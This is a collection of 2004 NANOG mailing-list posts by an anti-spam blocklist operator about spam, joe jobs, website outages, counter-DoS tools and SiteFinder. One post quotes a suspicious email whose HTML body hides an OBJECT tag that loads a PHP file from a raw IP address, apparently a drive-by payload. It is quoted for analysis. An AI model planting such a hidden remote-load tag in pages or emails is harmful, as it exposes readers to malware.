Re: Strange message possibly through nanog mail server
On Wednesday, March 17, 2004 5:57 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote: I Just received this. I would like to check if others have received it and did it indeed come through nanog mailist: Date: Wed, 17 Mar 2004 21:10:38 + From: Deep Throat [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Spamhaus Exposed Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ ___ And while the website was unavailable and the sender is being anonymous (whichis against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something through this mail list, which makes me think it might have come through merit mail machine but not actually though mail list). What I find even more disturbing is that ip address listed as origin (which may well have been forged if they managed to gain some highier level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that its some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software. I got it to. Let me throw some insight into this - notice the To line: To: [EMAIL PROTECTED] IIRC, thats Peter Schroebel, aka SMS Online. Peter has it out for Steve Linford of SpamHaus because SMS Online is listed for hosting spammers. He claims that SpamHaus wanted $10k from him to be removed. Peter tried to bribe the AHBL a few weeks ago to get us to remove him from our system. Peter likes to gloat about all the connections he has, and how powerful he is (though I have yet to see proof of this). So, I'm not exactly sure what to make of this... It could be Peter, and the mirror of the page I've seen certainly makes it look like something he'd write. But, could be a joe job too. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Request response
Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly. Anyone care to comment? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org Return-path: [EMAIL PROTECTED] Envelope-to: [EMAIL PROTECTED] Delivery-date: Wed, 17 Mar 2004 21:41:31 -0500 Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500 Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Date: Thu, 18 Mar 2004 13:40:35 +1000 To: [EMAIL PROTECTED] From: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600. X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600. Sender: [EMAIL PROTECTED] Precedence: bulk Errors-To: [EMAIL PROTECTED] X-Loop: nanog X-Scan-Signature: 0642888b67059a54bfdd4dcbc5a4659b X-SA-Exim-Connect-IP: 198.108.1.26 X-SA-Exim-Mail-From: [EMAIL PROTECTED] Subject: Request response Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on everest.sosdg.org X-Spam-Level: *** X-Spam-Status: No, hits=7.0 required=9.0 tests=BAYES_01,DCC_CHECK, FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_TAGS,HTML_MESSAGE,MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,NO_REAL_NAME,WEIRD_PORT autolearn=no version=2.63 X-Spam-Report: * 0.2 NO_REAL_NAME From: does not include a real name * -1.5 BAYES_01 BODY: Bayesian spam probability is 1 to 10% * [score: 0.0600] * 0.1 HTML_MESSAGE BODY: HTML included in message * 0.3 MIME_HTML_ONLY BODY: Message only has text/html MIME parts * 0.1 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL * 1.4 WEIRD_PORT URI: Uses non-standard port number for HTTP * 2.9 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/) * 1.0 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format * 2.6 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook X-SA-Exim-Version: 4.0 (built Tue, 16 Mar 2004 14:56:42 -0500) X-SA-Exim-Scanned: Yes (on mail.sosdg.org) Status: htmlbody font face=System OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php; /OBJECT/body/html
Re: Packet Kiddies Invade NANOG
On Monday, March 15, 2004 1:11 PM [EST], John Harold [EMAIL PROTECTED] wrote: Yes, Gregory Taylor aka OseK is a perfect gentlemen now. Here are logs from Feb 4th 2004 showing him being a perfect gentlemen... You know how easy it is to fake IRC logs? (16:12:01) #nanog!jh I l33t hax0red y0uz! (16:12:30) #nanaog!skrptkd No, I l33t hax0red y0uz first! and on and on, I don't know why you people seem to think I'm involved with all of this stuff. If you want to show evidence, do it offlist and among yourselves, because I don't think people give a crap about your little spats between one another - especially not based on IRC logs. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Cisco's Website down?
On Mon, March 15, 2004 3:21 pm, [EMAIL PROTECTED] said: Anyone else seeing an error getting to www.cisco.com? Yep, from AOL, level3, and RoadRunner. All coming back as 403. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
RE: Cisco website www.cisco.com 403 forbidden?
On Mon, March 15, 2004 3:41 pm, Todd Mitchell - lists said: | Behalf Of Jay Hennigan | Sent: March 15, 2004 3:19 PM | | Is it just me that they don't like? All fixed now, but load times are hella slow: Probably a million other people just discovered it was back up as well. I know alot of users that will just sit there, hitting refresh over and over again until the site finally comes up, instead of just going to do something else and coming back later. Then, when it finally comes back up, you have a million users who are hitting refresh over and over again because the site is slow, creating even more load, and you get the picture. :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: www.sunfreeware.com down too?
On Mon, March 15, 2004 3:51 pm, Jon R. Kibler said: Have noticed several sites down today. Can't seem to get to www.sunfreeware.com as well as Cisco. Works fine here. Possibly some flapping going on somewhere? I just logged into several routers and checked, I see nothing entirely out of the ordinary, but I don't have the most wide view of the Internet from these routers. It could also be DoS attacks too. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Cisco's Website down?
On Monday, March 15, 2004 6:01 PM [EST], Stephen J. Wilcox [EMAIL PROTECTED] wrote: Anyone else seeing an error getting to www.cisco.com? Yep, from AOL, level3, and RoadRunner. All coming back as 403. You expected the webserver to react differently depending on how your packets got there? Steve Possibly multiple web servers, each handling different areas, in some sort of a cluster? Its not unheard of. I used to have a system like that for one of my customers - based on where the traffic was coming from, the front end server which routed the connections to the various backend web servers, which would serve up slightly different data. Someone comes from RU, send them to a specific server which handles content for russia, and so on. 403 means permission denied, correct? Also could mean that its got the IP range you are coming from blacklisted. (Try visiting the Blars BL homepage from a blacklisted IP address, and you'll see what I mean). When trying to figure out where a problem is, sometimes its good to try from multiple locations regardless, even if it seems to be a problem specifically with the server itself. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: who offers cheap (personal) 1U colo?
On Sunday, March 14, 2004 4:58 PM [EST], Janet Sullivan [EMAIL PROTECTED] wrote: My cable modem provider filters port 25, so I can't run my own SMTP server. Their mail servers suck. Yes, I could pay for a business class cable modem connection and they'd unblock the port... but I'd likely still be filtered. Guess who is having a dedicated 1U set up right now? ;-) I think Paul is right, there is a small niche market for this. Hm, are there companies out there that offer outbound SMTP services (for people who are blocked, or which need a mail server thats not blacklisted because their provider isn't dealing with spam problems)? I never really looked into too much, but I haven't seen it offered on provider's sites outright. I was considering setting up a service like this (we have 2-3 outbound mail relay servers that are sitting idle because we don't need them yet), but wasn't sure how interested people would be. Like, say, setup a service that offers people the ability to send outbound mail through based on IP ACLs, possibly SMTP AUTH, TLS/SSL certs, and other things which could authenticate the sender, and have it accept SMTP on various other non-25 ports. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
RE: who offers cheap (personal) 1U colo?
On Sun, March 14, 2004 5:45 pm, Vivien M. said: Have you been looking at providers in the right industry? Such services are usually offered as addons by people who sell DNS services (especially dynamic DNS) and other such things designed to make it easier for people to run their own servers. They do exist, and as was pointed out earlier in this discussion, cost much less than the 1U colo alternative. We do it, and I know at least one or two others in our industry do... I have actually. I see an awful lot of services for incoming SMTP filtering of spam/viruses, or just to hold the mail while you are offline, but haven't seen outgoing SMTP services - which is why I asked :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 2:43 AM [EST], Jay Hennigan [EMAIL PROTECTED] wrote: On the other hand, they could become immensely popular, reaching the critical mass when one of them detects what is interpreted as an attack from a network protected by another. Grab the popcorn and watch as they all bludgeon each other to death. :-) Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivelant of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 3:05 AM [EST], Brian Bruns [EMAIL PROTECTED] wrote: Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivelant of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party? I hit send way to fast, heh. Whats going to happen when they find a nice little exploit in these buggers (even if they have anti-spoof stuff in them) that allows the kids to take control of them or trick them into attacking innocents? Instead of thousands of DDoS drones on DSL and cable modems, you'll see kids with hundreds of these 'nuclear stike firewalls' on T1s, T3s, and higher, using them like they use the current trojans? No product is 100% secure (especially not something that runs under Windows, but thats another issue), so how are they going to deliver updates? Or make sure that the thing is configured right? I could see blacklists (BGP based) cropping up of these systems, so that you can filter these networks from ever being able to come near your network. This is starting to sound more and more like a nuclear arms race - on one side we have company a, on the other company b. Company A fears that B will attack it, so they get this super dooper nuclear strike system. Company B follows suit and sets one up as well. Both then increase their bandwidth, outdoing the other until finally, script kiddie comes along, and spoofs a packet from A to B, and B attacks A, and A responds with its own attack. ISPs hosting the companies fall flat on their face from the attack, the backbone between the two ISPs gets lagged to death, and stuff starts griding to a halt for others caught in the crossfire. So, and who thinks that this is a good idea? :) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 6:16 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote: Which RBL operators flood /24's or /16's? What do they flood them with? I think he meant that RBLs sometimes include entire /24 in RBL list when only one or two ips are at fault and some would go even highier to include entire ISP allocation. This is probably talking about SPEWs and alike RBLs That usually only happens when providers ignore abuse reports and don't do something about their abusive customers. Thats how we do it at the AHBL - you ignore abuse reports for long enough and pretend like the problem doesn't exist, you get a /24 listed. You move the spammer to another block, inside your network, and it grows to encompass the new block as well as the old one. And it keeps going from there. Thats how the rima-tde blocks that are in the AHBL got started - single /32s, then as the spam and 419 scams came in faster, it expanded to /24s, and finally after 2 dozen or so /24s blocked, I started going for /20s and larger. Now I've got two /13s, and a /16 of theirs blocked until Telefonica decides to contact us and discuss the situation with the abuse coming from their network. When providers dont act on abuse, you have to put the pressure on. Sometimes, that means forcing their legit customers to start to complain and thow a fit with their provider over the blocks. Yes, its ugly and unfair, but thats the only way to get them to act. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: wholesalebandwidth.com major sponsor of spammers refuses to accept email at abuse
On Thursday, March 11, 2004 10:11 PM [EST], Henry Linneweh [EMAIL PROTECTED] wrote: I have received almost 200 different spam messages from domains hosted by this provider from russain domains attempting to sell pharmacueticals and other unsolicited services that I do not want tekmailer.com and moosq.com are 2 of the primary abusers from this hosting company -Henry Message from yahoo.com. Unable to deliver message to the following address(es). [EMAIL PROTECTED]: 69.6.21.60 does not like recipient. Remote host said: 550 5.7.1 [EMAIL PROTECTED]... Relaying denied Giving up on 69.6.21.60. Wholesalebandwidth is just a front-end for spammers. I've had them blacklisted for a long time with no ill affects (and alot less spam). -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Need a cox.net mail server contact
Hello all, If a cox.net mail admin, or someone who knows a cox.net mail admin could contact me offlist about them blocking 2mbit.com in their mail servers, that would be great. I've tried contacting their [EMAIL PROTECTED] with UNBLOCK in the subject, but it just bounces the mail back at me with the same error as if I was trying to contact one of their users. Sooo, you kinda see the issue. Thanks -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Need a cox.net mail server contact
On Thursday, March 11, 2004 1:19 AM [EST], Gregory Taylor [EMAIL PROTECTED] wrote: The IP that 2mbit.com inhabits is on a Road Runner commercial block, which is allocated for small to mid-sized businesses. There is no reason for commercial cable networks to be blocked under the same pretenses that consumer cable networks are blocked. Just my 2 cents Its the domain specificly. Not the IP. I can send to cox.net using one of my other dozen domain names from our IPs directly without a block. But, no matter where I try 2mbit.com from, its blocked. I suspect it has something to do with the 'fix' I was told by cox.net that was in place to prevent them from DoSing our mail servers with bounces. Rather then actually fixing their mail servers, just block my domain so that the joe job doesn't cause bounces in the first place. How nice of them eh? Guess my cox.net mail server blacklist entry in the AHBL during the attack didn't get the message through. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Information Warfare
On Saturday, March 06, 2004 4:46 AM [EST], william(at)elan.net [EMAIL PROTECTED] wrote: Here is a quote from their press-release I especially like: ... Symbiot has introduced the first and only tool that intelligently and accurately responds to hostile attacks against enterprise networks, said Richard Forno, former chief security officer for Network Solutions, and a noted information warfare specialist. While other companies offer only passive defense barriers, Symbiot provides the equivalent of an active missile defense system ... Lovely. So not only do we now have to fend off attacks from script kiddies and packet monkies, we now have to fend off attacks from idiot sysadmins who set this tool up and allow it to go all out on supposed 'attacks' against their systems. I'll share my favorite goober with firewall story.When I was a sysadmin/netadmin at a large ISP, I used to get these 'attack' reports from clueless users all the time. I could identify which tool they used just by how the body of the message looked and how the 'attack' was described. Got ones saying that my performance testing server (which sometimes did ping scans across the dialups to see what the general response time was) was 'attacking' the user's machine with a single ICMP echo. Or how our IRC server was trying to attack the user on the ident port every time they tried to connect. Of course, the best one was when a supposed 'security expert' called up and complained how my two caching DNS servers for the T1 customers was attacking his entire network on port 53 UDP. He had naturally filtered the 'attack' because it was obvious that our Linux DNS servers were infected with one of the latest Windows viruses going around, and suddenly noone on his network could browse the web anymore. So, let me ask the question, do we really want people like that having a tool which autoresponds to attacks with attacks? At least when he filtered out our DNS traffic, it only affected his network... But imagine if he had launched an attack against my DNS servers in response? Yeah, thats a great idea. Of course, now that the AHBL does its own proxy testing, we get all sorts of fun reports from end users about our 'attacks' against their machines. Latest one demanded I tell her why we had scanned her, but wouldn't tell me her IP address or when the scan happened exactly, claiming that I had done the scan, so I should know what IP she is. Too bad I test over 100,000 IP addresses daily for open proxies Lets not even get into the legal consequences for a tool like this, especially if it backfires and launches an attack against the NIPC, for example. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: The Geography of Spam
On Tuesday, March 02, 2004 11:11 AM [EST], [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Thought folks might find this blurb from Sophos on the geography of Spam interesting. 30% of Spam, they report, comes from hijacked PC's. Matches pretty close to what we see across our network - i.e. all sorts of stuff from swbell.net o U.S. Routes More Spam than World Combined, Study Shows Paris -- Intentionally or not, the U.S. routes more spam e-mail traffic than the rest of the world combined, according to a new study by anti-virus firm Sophos. The study concludes that most of the unsolicited junk e-mails originate in Russia and then passes through hacked computers in the U.S. More than 30% of the world's spam is sent from these compromised computers, underlining the need for a coordinated approach to spam and viruses, said Charles Cousins, Sophos' Asia managing director . The U.S. accounts for a whopping 56% of the global spam pie, followed by Canada with 6.8%. Europe did not fair very well in the report either, with the Netherlands (5th), Germany (7th), France (8th), the U.K. (9th) and Spain (12th) all making the list. http://www.sophos.com/spaminfo/articles/dirtydozen.html I guess I can say, that I can somewhat agree with what they are saying, but the percentage seems to be a bit lower then what I would have said. With the recent round of viruses that seem to be designed to help spammers hijack end user machines, I'd say the percentage is more towards 45-50%. Sometimes its very hard to tell the difference between an open proxy, and a drone running an open proxy (take the AHBL's proxy list, which is over 410,000 proxies listed, and our infected/hijacked machine count comes nowhere near that). Part of the reason why alot of the spam comes from outside of the US is because US spammers need to hide their actual locations in order to avoid getting snared by CAN-SPAM and similar. This is why Ralsky bases his spamming campaigns out of China, where the laws are more relaxed in terms of this stuff, and is less likely to get yanked off of his net connection. This is also why spammers have 'fronts'. :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Need Comcast contact
Anyone happen to know of a contact for Comcast's mail server administrators? I need to discuss an issue with them about their mail servers mailbombing my systems from a joe job. Thanks. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Microsoft on security holes
I just saw this on slashdot, so for those of you who don't read slashdot, enjoy. http://news.bbc.co.uk/1/hi/technology/3485972.stm Yeah, its a little bit off topic, but with the recent amount of viruses, worms, trojans, etc going around the Internet that are causing havoc with general day to day operations of ISPs, this is quite an interesting read. Basically, Microsoft is claiming that security exploits only come out after patches. Uh huh, yeah right. (waiting for his list AUP violation notice, again) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote: Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc? Rather then clutter up NANOG with this stuff, since its apparent that we will be having more issues about SiteFinder, I've gone ahead and setup a discussion list on my server for general talk about SiteFinder. Its unmoderated, everyone is welcome to signup and post your views. http://wwwapps.2mbit.com/mailman/listinfo/sitefinder-discuss -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote: Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc? It gives Verisign/NetSol the ability to generate exclusive profit from the hijacking of every non-existant domain name in existance. No other registar could do something like this without paying for every last domain they take, or could they ever do anything like this due to the fact that Verisign/NetSol controls ALL of the TLD servers for .com and .net. -- Brian Brunsk The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: [IP] VeriSign prepares to relaunch Site Finder -- calls
On Tuesday, February 24, 2004 3:09 PM [EST], Dan Hollis [EMAIL PROTECTED] wrote: On Tue, 24 Feb 2004, Jason Nealis wrote: It's a module plug-in into bind and if you prefer to try and do this in a opt-in basis they have a client program that you download and it gets hooked into the users browser. This is the right way to do it, end user opt in, and browser only. Unlaterally forcing it upon everyone and breaking non www based apps is the wrong way to do it. -Dan Also means less profit. We already know for a fact that Verisign/Netsol could give a damn about whats right and wrong, and whats a good way to do something and whats a bad way to do something. Anything that cuts into their profit they will kick and scream bloody murder until they get their way. Remember what happened when they were forced to allow other registars access to their database? I remember specifically service quality go horribly through the floor, requests getting screwed up, almost on purpose, billing messups that never happened before, etc. And this suddenly happened right around the same time that their monopoly was forcefully taken away. I dont even want to ponder what kind of outages and other issues we will have if they don't get their way. I have a feeling that I'm going to get whacked for violating the AUP of the list, but oh well. Truth hurts. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: T1 Customer CPE Replacement?
On Monday, February 23, 2004 3:37 PM [EST], Claydon, Tom [EMAIL PROTECTED] wrote: Hello, We're looking for a good replacement for fractional T1 customers with Cisco 1600- 1700-series routers as their CPE. They are good routers, but the ongoing support costs are an issue, and we need to replace them ASAP. Someone had mentioned several CPE vendors, such as Adtran and Netopia. Are there any others, and does anyone have any pros/cons of what they're familiar with? I'm quite familiar with the Netopia R53xx series T1 routers. Excellent little routers for deplyoing to customers. Very reliable, and if you are familiar with the DSL routers, you'll be right at home. They have built in PPTP/ATMP/IPSec VPN support (both client and server), basic routing features, filtering, NAT, one-to-one IP mapping, remote syslog logging, as well as everything you'd expect in a T1 router (fractional T1 support, HDLC, PPP, FrameRelay, etc). Theres also a 56k dialup backup module which is handy. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: [IP] VeriSign prepares to relaunch Site Finder -- calls
On Tuesday, February 10, 2004 1:02 AM [GMT-5=EST], Scott Savage [EMAIL PROTECTED] wrote: When NXDOMAIN returned, the issue disappeared and we haven't tested it again. I can confirm this same type of issue with several clients of mine that run microsoft networking stuff, suddenly were unable to locate devices on the network (like printers and NT file servers) as soon as the Verisign sitefinder stuff came online. I'll have to let my clients know who to bill when they do this again :-) Actually, I wrote about alot of the issues in my paper at: http://www.sosdg.org/papers/VSGNWCD.html Its not really geared to technical people, but might be useful if talking to end users about the problems associated with sitefinder. Should probably update it with some of the newer issues I've been finding. Unfortunately, when you talk about SiteFinder, what ends up happening is that you can't avoid the financial end of it. There is no technical reason why SiteFinder needs to exist. It is purely a financial reason why SiteFinder exists. If they weren't concerned about money, Verisign would be offering all of the other registars an oppertunity to get involved too, and they wouldn't be selling ads on the site and paid search listings. AOL, MSN, and god knows how many other ISPs implement this internally on their networks without affecting the rest of the world. Of course, I already know that Verisign is going to start saying that you can opt-out of it this time around and how it wont break everything again. We all know that their claims are, well, full of crap. But, its going to end up being how fast Verisign can spin it in their favor. I mean, look at SCO, and compare it to what Verisign is doing. They both don't seem to care how the rest of the world views them, and don't seem to have a problem turning the rest of the world against themselves. Of course, neither realizes that because of their actions, they will face opposition for the rest of their existance. People don't just forget stuff like this. Especially not when it happens multiple times. Anyways, enough of my moaning about the problem for now. If anyone has any real life examples and stories they'd like to share with me so I can add to my paper on the SiteFinder issue, let me know offlist, and I'll add it. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Unbelievable Spam.
On Monday, February 02, 2004 4:01 PM [GMT-5=EST], Ejay Hire [EMAIL PROTECTED] wrote: It's just wrong in my opinion, and exacerbated by the fact that it was spammend to our abuse account. Their /24 just fell off of my piece of the internet. Have I just been blind to this all along, or are the spammers getting bolder? Its called a joe job - spammers do it when they get spanked by an antispammer or someone else they don't like. Usually happens right after their service gets shut off, but they could do it for dozens of reasons. Hipcrime (aka dippy) loves doing this, and less then two months ago he went on a joe job spree spamming my home phone number and a dozen other people's. They are bold, and don't seem to fear anyone. You can keep killing them, and they don't learn. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: AOL web troubles.. New AOL speedup seems to be a slowdown
snipped since its kinda long Just got done working with my mother's machine again, and have been watching her and a bunch of other people who use AOL 9.0 and some who use 8.0. Something over the past week alone has definately happened in regards to the AOL TopSpeed stuff. I've got a situation with more then 75% of the people I've tested, that they have problems running java applets (including AOL's own link into pogo games) in AOL 9.0 GM (that they are distributing to end users). When the user switches to AOL 8.0, the problem exist. When the user uses IE separate from AOL, the problem does not exist. There are other issues developing as well - random freezing of java games for example. Once again, this only happens in 9.0. This was working fine two weeks ago on all of these people's machines. Of course, this is increasing my daily workload, as I now have users having problems that I need to sit and try and diagnose. I've been telling people to use AOL 8.0 or IE if they want to play games. But, yes, there appears to be a problem somewhere with this TopSpeed stuff that people have been noting complaints about. Sorta off topic, but alot of people here also do support for this kind of stuff, and would like to get some feedback as to what others are seeing with their end users. I have a sinking feeling that when I take the time to file an official bug report/issue, they will tell me 'reformat and reinstall'. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: AOL web troubles.. New AOL speedup seems to be a slowdown
On Thursday, January 29, 2004 7:14 PM [GMT-5=EST], Kevin Loch [EMAIL PROTECTED] wrote: Nicole wrote: In the past few days our AOL users have been reporting serious problems Several Brickshelf users have complained about the new blurry images problem using AOL. I have not heard any reports of broken images or upload problems yet. Kevin Loch I This is more of their AOL TopSpeed stuff. Basically, the reason why end users are seeing the blurry images is because of the AOL ART format being used by their web proxies. Downloaded images via the built in web browser are actually not in the same format as they were on the server. Basically, AOL's proxies download the image, recompress it as an ART image (killing a good portion of the quality in photos especially) and forwards it to the built in IE browser which knows how to render the ART images (even though the images themselves are still called .gif and .jpg and similar). Want to see an example of this? In older AOL versions (before 7 IIRC), load up a photo in the built in IE browser in AOL with image compression on, right click and save the image to disk, then try to open it with third party image program such as GIMP or PaintShop Pro and watch it moan about the format not being right. The sudden decrease in quality could be because they turned up the compression level. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: AOL web troubles.. New AOL speedup seems to be a slowdown
On Friday, January 30, 2004 12:34 AM [GMT-5=EST], Benjamin Chase [EMAIL PROTECTED] wrote: I am certainly not trying to make the point that anyone taking part in using web accelerators is violating a copyright by viewing content that is not necessarily in the original form, but I've been witness to a few discussions on several prominent (photo.net, etc) websites where the issue was being raised that the act of the parent company (in this case AOL) collecting images on their proxy and redistributing them to their users (in a new form, recompressed) pretty much negates any digital watermarking present in an image. Am I concerned about it personally? Not at all. Since I shoot primarily 35mm transparency film, I have a physical original of a piece of work, and if I needed to prove an image was really mine, then I would produce the physical copy. Properly implemented watermarking won't be affected by the recompression. It may not be as clear to the program as it would be if it was in its old format, but its still legible. Since I'm a photographer, I've tested this theory a bit because of concerns that my black and white photos (which I actually sell for money) might be stolen off of our gallery site. You'd have to badly degrade the quality in order to completely destroy the watermarks completely, as long as you implemented the watermarking correctly in the first place. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: example.com/net/org DNS records
I'd say the problem of 1918 leakage is a bigger concern. Quite a big problem. Because some of the major backbones don't bother to filter that address space in the src of the packets, DDoS tools just love forging UDP packets with reserved space, which makes it nearly impossible to correctly track down where its coming from. A good example of this issue is with at least two of the AHBL nameservers run by the SOSDG (I have no idea what the other nameservers are seeing as they are not managed by us, but they are probably getting similar queries), someone from 192.168.1.20 is making dns queries for ip4r lookups under dnsbl.ahbl.org. Of course, the bogon filters stop it dead in its tracks, but, the fact that its getting through across Sprint, Cogentco, and similar isn't a good sign. Providers should be filtering at their borders both src and dst packets going to any of the reserved spaces. If they did, this wouldn't be an issue. Now, the better question is, what idiot is doing those dnsbl queries on our servers, and why haven't they noticed that the lookups don't work, and resolving in general probably isn't working? Who knows. Side note: sorry about the weird quoting. OE-Quotefix is somehow barfing on your message specifically and crashing, so I had to turn it off -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: [EMAIL PROTECTED] To: Roger Marquis [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Sunday, January 04, 2004 3:05 PM Subject: Re: example.com/net/org DNS records
Re: example.com/net/org DNS records
